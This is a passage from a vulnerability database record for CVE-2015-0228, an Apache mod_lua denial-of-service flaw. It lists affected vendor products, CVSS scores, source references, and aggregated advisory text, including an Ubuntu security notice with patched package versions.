"mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "linux", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "14.10", }, { model: "linux lts", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "14.04", }, { model: "linux lts i386", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "12.04", }, { model: "linux lts amd64", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "12.04", }, { model: "linux sparc", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "10.04", }, { model: "linux powerpc", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "10.04", }, { model: "linux i386", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "10.04", }, { model: "linux arm", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "10.04", }, { model: "linux amd64", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "10.04", }, { model: "linux", scope: "eq", trust: 0.3, vendor: "slackware", version: "14.1", }, { model: "linux x86 64 -current", scope: null, trust: 0.3, vendor: "slackware", version: null, }, { model: "linux x86 64", scope: "eq", trust: 0.3, vendor: "slackware", version: "14.1", }, { model: "linux x86 64", scope: "eq", trust: 0.3, vendor: "slackware", version: "14.0", }, { model: "linux", scope: "eq", trust: 0.3, vendor: "slackware", version: "14.0", }, { model: "linux -current", scope: null, trust: 0.3, vendor: "slackware", version: null, }, { model: "linux", scope: "eq", trust: 0.3, vendor: "oracle", version: "7", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x4.1.5", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x3.2.2", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x3.2.1", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x3.1.2", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x4.1", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x4.0", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x3.2", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x3.0", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.10.5", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.9.5", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.10.4", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.10.3", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.10.2", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.10.1", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.10", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.12", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.11", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.10", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.4", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.9", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.8", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.7", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.6", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.3", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.2", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.1", }, { model: "mac os server", scope: "ne", trust: 0.3, vendor: "apple", version: "x5.0.3", }, { model: "mac os", scope: "ne", trust: 0.3, vendor: "apple", version: "x10.10.5", }, { model: "apache", scope: "ne", trust: 0.3, vendor: "apache", version: "2.4.13", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "73041", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "CNNVD", id: "CNNVD-201503-136", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/a:apache:http_server", vulnerable: true, }, { cpe22Uri: "cpe:/o:apple:mac_os_x", vulnerable: true, }, { cpe22Uri: "cpe:/o:apple:os_x_server", vulnerable: true, }, { cpe22Uri: "cpe:/a:oracle:enterprise_manager_ops_center", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2015-001673", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, ], trust: 0.3, }, cve: "CVE-2015-0228", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "CVE-2015-0228", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "VHN-78174", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:P", version: "2.0", }, ], cvssV3: [], severity: [ { author: "nvd@nist.gov", id: "CVE-2015-0228", trust: 1, value: "MEDIUM", }, { author: "NVD", id: "CVE-2015-0228", trust: 0.8, value: "Medium", }, { author: "CNNVD", id: "CNNVD-201503-136", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-78174", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2015-0228", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-78174", }, { db: "VULMON", id: "CVE-2015-0228", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "CNNVD", id: "CNNVD-201503-136", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "The lua_websocket_read function in lua_request.c in the mod_lua module in the Apache HTTP Server through 2.4.12 allows remote attackers to cause a denial of service (child-process crash) by sending a crafted WebSocket Ping frame after a Lua script has called the wsupgrade function. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Apache HTTP Server is prone to a remote denial-of-service vulnerability. \nA remote attacker may exploit this issue to trigger denial-of-service conditions. \nVersions prior to Apache HTTP Server 2.4.13 are vulnerable. The server is fast, reliable and extensible through a simple API. ============================================================================\nUbuntu Security Notice USN-2523-1\nMarch 10, 2015\n\napache2 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Apache HTTP Server. This\nissue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2014-3581)\n\nTeguh P. Alko discovered that the mod_proxy_fcgi module incorrectly\nhandled long response headers. This\nissue only affected Ubuntu 14.10. (CVE-2014-3583)\n\nIt was discovered that the mod_lua module incorrectly handled different\narguments within different contexts. This issue only affected\nUbuntu 14.10. (CVE-2014-8109)\n\nGuido Vranken discovered that the mod_lua module incorrectly handled a\nspecially crafted websocket PING in certain circumstances. This issue only affected\nUbuntu 14.10. (CVE-2015-0228)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n apache2.2-bin 2.4.10-1ubuntu1.1\n\nUbuntu 14.04 LTS:\n apache2.2-bin 2.4.7-1ubuntu4.4\n\nUbuntu 12.04 LTS:\n apache2.2-bin 2.2.22-1ubuntu1.8\n\nUbuntu 10.04 LTS:\n apache2.2-bin 2.2.14-5ubuntu8.15\n\nIn general, a standard system update will make all the necessary changes. \n \n A race condition flaw, leading to heap-based buffer overflows,\n was found in the mod_status httpd module. \n \n mod_lua.c in the mod_lua 